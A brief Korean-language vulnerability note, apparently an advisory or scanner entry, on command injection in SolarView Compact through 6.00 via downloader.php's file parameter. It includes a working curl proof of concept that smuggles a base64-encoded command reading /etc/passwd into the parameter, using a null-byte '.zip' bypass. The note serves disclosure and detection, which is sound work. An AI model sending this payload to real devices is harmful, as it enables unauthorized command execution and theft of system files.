
SolarView Compact 6.00까지 버전에 명령 주입 취약점이 존재합니다. 공격자는 downloader.php를 통해 내부 제한을 우회하여 명령을 실행할 수 있습니다.
SolarView Compact 6.00까지 명령 삽입 취약점이 존재하며, 공격자는 downloader.php를 통해 내부 제한을 우회하여 명령을 실행할 수 있습니다.
curl http://example.com/downloader.php?file=;echo%20Y2F0IC9ldGMvcGFzc3dkCg==|base64%20-d|bash%00.zip | grep root:.*:0:0
downloader.php 페이지의 file 매개변수에 접근하여 내부 제한을 우회함으로써 명령을 삽입할 수 있습니다.
